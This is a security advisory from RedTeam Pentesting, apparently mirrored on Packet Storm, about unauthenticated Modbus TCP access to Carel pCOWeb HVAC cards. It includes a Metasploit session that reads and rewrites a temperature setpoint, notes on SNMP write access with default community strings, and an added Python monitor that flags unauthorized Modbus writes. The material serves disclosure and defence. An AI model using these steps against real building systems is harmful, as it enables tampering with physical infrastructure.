Carel pCOWeb HVAC Modbus Interface Authentication Bypass

Published: 31 Oct 2019 00:00:00
Reported by: redteam-pentesting.de
Type: packetstorm
Source: packetstormsecurity.com
Views: 347

The Carel pCOWeb HVAC Modbus interface allows unauthenticated access to the Modbus interface; the security risk is rated high.

Related

| Family    | Title                                                              | Published         | Reporter  |
|-----------|--------------------------------------------------------------------|-------------------|-----------|
| Circl     | CVE-2019-13549                                                     | 27 Jan 2024 14:41 | circl     |
| CNVD      | Rittal Chiller SK 3232-Series Improper Access Control Vulnerability | 24 Oct 2019 00:00 | cnvd      |
| CVE       | CVE-2019-13549                                                     | 25 Oct 2019 17:43 | cve       |
| Cvelist   | CVE-2019-13549                                                     | 25 Oct 2019 17:43 | cvelist   |
| EUVD      | EUVD-2019-5004                                                     | 7 Oct 2025 00:30  | euvd      |
| ICS       | Rittal Chiller SK 3232-Series                                      | 24 Oct 2019 00:00 | ics       |
| NVD       | CVE-2019-13549                                                     | 25 Oct 2019 18:15 | nvd       |
| Prion     | Authentication flaw                                                | 25 Oct 2019 18:15 | prion     |
| RedhatCVE | CVE-2019-13549                                                     | 22 May 2025 10:06 | redhatcve |
Advisory: Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC  
  
As part of its feature set, the Carel pCOWeb card exposes a Modbus  
interface to the network. By design, Modbus provides no  
authentication, so anyone who can reach the interface can control the  
affected system.  
  
  
Details  
=======  
  
Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface  
Affected Versions: "A 1.4.11 - B 1.4.2", possibly others  
Fixed Versions: product obsolete  
Vulnerability Type: Unauthenticated Access  
Security Risk: high  
Vendor URL: https://www.carel.com/product/pcoweb-card  
Vendor Status: notified / product obsolete  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-14  
Advisory Status: published  
CVE: GENERIC-MAP-NOMATCH  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH  
  
  
Introduction  
============  
  
"The pCOWeb card is used to interface the pCO Sistema to networks that  
use the HVAC protocols based on the Ethernet physical standard, such as  
BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated  
Web-Server, which both contains the HTML pages relating to the specific  
application and allows a browser to be used for remote system  
management."  
(from the vendor's homepage)  
  
It is used as an OEM module in several different HVAC systems and  
considered obsolete by the vendor.  
  
  
More Details  
============  
  
While authentication is required to access the web interface (compare  
advisory rt-sa-2019-013 [0]) no authentication is necessary for using  
the Modbus interface on TCP port 502, since the Modbus protocol did not  
offer any authentication mechanism during the device's lifetime.  
The addition of encryption and authentication was only recently proposed  
by the Modbus Organization [1].  
  
It is believed that this might be analogous to the problem described in  
CVE-2019-13549 for the special case of Rittal SK 3232 products. Other  
OEMs are affected, too.  
  
  
Proof of Concept  
================  
  
The web interface of the Carel pCOWeb card allows authenticated users to  
read and write many variables of the system via the URL  
  
http://192.168.0.1/config/adminpage.html  
  
This web page seems to provide access to all Modbus variables using  
large tables of variables 1-207 for digital, analog and integer  
variables, respectively.  
  
By accessing TCP port 502 (Modbus TCP), it is possible to access  
these variables without authentication. This can be done, for example,  
by using the Metasploit [2] modbusclient [3] module:  
  
------------------------------------------------------------------------  
msf5 > use auxiliary/scanner/scada/modbusclient  
msf5 auxiliary(scanner/scada/modbusclient) > set RHOSTS 192.168.0.1  
RHOSTS => 192.168.0.1  
msf5 auxiliary(scanner/scada/modbusclient) > set DATA_ADDRESS 10  
DATA_ADDRESS => 10  
msf5 auxiliary(scanner/scada/modbusclient) > run  
  
[*] 192.168.0.1:502 - Sending READ REGISTERS...  
[+] 192.168.0.1:502 - 1 register values from address 10 :  
[+] 192.168.0.1:502 - [240]  
[*] Auxiliary module execution completed  
------------------------------------------------------------------------  
  
The returned value matches the set temperature of 24°C multiplied by  
ten, as the variable can only hold integers. Using the same module, it  
is possible to change the temperature setpoint, too:  
  
------------------------------------------------------------------------  
msf5 auxiliary(scanner/scada/modbusclient) > set ACTION WRITE_REGISTER  
ACTION => WRITE_REGISTER  
msf5 auxiliary(scanner/scada/modbusclient) > set DATA 241  
DATA => 241  
msf5 auxiliary(scanner/scada/modbusclient) > run  
  
[*] 192.168.0.1:502 - Sending WRITE REGISTER...  
[+] 192.168.0.1:502 - Value 241 successfully written at registry address 10  
[*] Auxiliary module execution completed  
------------------------------------------------------------------------  
  
This allows unauthenticated remote attackers to reconfigure the device.  
  
Depending on OEM integration, different variables might represent  
different settings.  
  
Additionally, the system provides SNMP (UDP Port 161) write access with  
the SNMP community string "public" or "carel" (depending on version) as  
documented in the manual [4] and BACnet over IP (UDP Port 47808).  
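The exchange above shows why the problem is structural: a Modbus/TCP request carries a 7-byte MBAP header (transaction id, protocol id, length, unit id) followed directly by the function code and its operands, with no field that could hold a credential. The following is an added example, not code from the advisory or from Carel or RedTeam Pentesting. It decodes Modbus/TCP request frames and runs a simple monitoring rule over constructed sample traffic: any write function code (5, 6, 15, 16) arriving from a host that is not on an allow list of known controllers is flagged, which is the kind of check a network monitor on the OT segment can apply when the device itself cannot enforce authentication. The IP addresses, register address 10 and the value scaling (240 meaning 24.0 °C) follow the advisory's session; the allow list and the sample frames are assumptions constructed for the example.

```python
import struct
from dataclasses import dataclass

# Function codes defined in the Modbus application protocol specification.
FC_NAMES = {
    1: "READ_COILS",
    2: "READ_DISCRETE_INPUTS",
    3: "READ_HOLDING_REGISTERS",
    4: "READ_INPUT_REGISTERS",
    5: "WRITE_SINGLE_COIL",
    6: "WRITE_SINGLE_REGISTER",
    15: "WRITE_MULTIPLE_COILS",
    16: "WRITE_MULTIPLE_REGISTERS",
}
WRITE_FCS = {5, 6, 15, 16}


@dataclass
class ModbusRequest:
    transaction_id: int
    unit_id: int
    function_code: int
    address: int
    value_or_count: int  # register value for writes, quantity for reads


def parse_request(frame: bytes) -> ModbusRequest:
    """Decode a Modbus/TCP request ADU: MBAP header (7 bytes) + PDU.

    The header carries only transaction id, protocol id (always 0),
    remaining length and unit id. Nothing in the frame identifies or
    authenticates the sender, which is the point of the advisory.
    """
    if len(frame) < 12:
        raise ValueError("frame too short for MBAP header plus a minimal PDU")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError(f"unexpected protocol id {proto}")
    # length counts the unit id byte and everything after it
    if length != len(frame) - 6:
        raise ValueError("MBAP length field does not match frame size")
    fc, addr, val = struct.unpack(">BHH", frame[7:12])
    return ModbusRequest(tid, unit, fc, addr, val)


def build_request(tid: int, unit: int, fc: int, addr: int, val: int) -> bytes:
    """Encode a request ADU; used here only to construct sample traffic."""
    pdu = struct.pack(">BHH", fc, addr, val)
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def setpoint_celsius(raw: int) -> float:
    """Register 10 on the tested unit held the setpoint times ten (240 -> 24.0)."""
    return raw / 10


def audit(events, allowed_writers):
    """Flag write requests from hosts outside the allow list and malformed frames.

    events: iterable of (source_ip, frame_bytes) as a passive tap would see them.
    Returns a list of (source_ip, category, detail) findings.
    """
    findings = []
    for src, frame in events:
        try:
            req = parse_request(frame)
        except ValueError as exc:
            findings.append((src, "MALFORMED", str(exc)))
            continue
        name = FC_NAMES.get(req.function_code, f"FC{req.function_code}")
        if req.function_code in WRITE_FCS and src not in allowed_writers:
            detail = f"{name} unit={req.unit_id} addr={req.address} value={req.value_or_count}"
            findings.append((src, "UNAUTHORIZED_WRITE", detail))
    return findings


# Constructed sample traffic (assumption): 10.0.0.2 is the building
# management host that is expected to write setpoints; 10.0.0.5 is not.
ALLOWED_WRITERS = {"10.0.0.2"}
SAMPLE_EVENTS = [
    ("10.0.0.2", build_request(1, 1, 3, 10, 1)),    # read 1 holding register at 10
    ("10.0.0.5", build_request(2, 1, 6, 10, 241)),  # write 241 to register 10, as in the advisory
    ("10.0.0.2", build_request(3, 1, 6, 10, 235)),  # same write from the allowed controller
    ("10.0.0.5", b"\x00\x04\x00\x00\x00\x02\x01\x03"),  # truncated frame
]

if __name__ == "__main__":
    for src, category, detail in audit(SAMPLE_EVENTS, ALLOWED_WRITERS):
        print(f"{src:10} {category:18} {detail}")
    print("current setpoint:", setpoint_celsius(240), "degC")
```

The rule deliberately ignores reads: on a segment where port 502 is reachable, reads from unexpected hosts are also worth logging, but the write path is what changes the setpoint. In a real deployment the frames would come from a packet capture or an IDS hook rather than the constructed list, and the allow list would be the set of controllers that legitimately write to the card.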
  
Workaround  
==========  
  
The Carel pCOWeb card should not be connected to networks accessible by  
untrusted users.  
  
  
Fix  
===  
  
No updated firmware will be published for pCOWeb Cards, as they are  
obsolete since Dec 2017. A successor hardware with current firmware is  
available for OEM integrators.  
  
  
Security Risk  
=============  
  
Since the Modbus protocol implemented in the Carel pCOWeb card does not  
offer authentication, it is not possible to limit access to the system  
to authorized users, allowing attackers to control the system if the  
device is accessible via the network. This is considered to pose a high  
risk in the context of the Carel pCOWeb card.  
  
  
Timeline  
========  
  
2019-07-17 Vulnerability identified  
2019-08-03 Customer approved disclosure to vendor  
2019-09-02 Vendor notified  
2019-09-09 Vendor did not respond as promised  
2019-09-17 Vendor could not be reached  
2019-09-18 Vendor could not be reached  
2019-10-28 Advisory published due to publication of CVE-2019-13549  
  
  
References  
==========  
  
[0] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-013.txt  
[1] http://modbus.org/docs/MB-TCP-Security-v21_2018-07-24.pdf  
[2] https://www.metasploit.com/  
[3] https://www.rapid7.com/db/modules/auxiliary/scanner/scada/modbusclient  
[4] https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
  
Working at RedTeam Pentesting  
=============================  
  
RedTeam Pentesting is looking for penetration testers to join our team  
in Aachen, Germany. If you are interested please visit:  
https://www.redteam-pentesting.de/jobs/  
  
--   
RedTeam Pentesting GmbH  
Dennewartstr. 25-27  
52068 Aachen  
Germany  
Tel.: +49 241 510081-0  
Fax : +49 241 510081-99  
https://www.redteam-pentesting.de  
Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen  
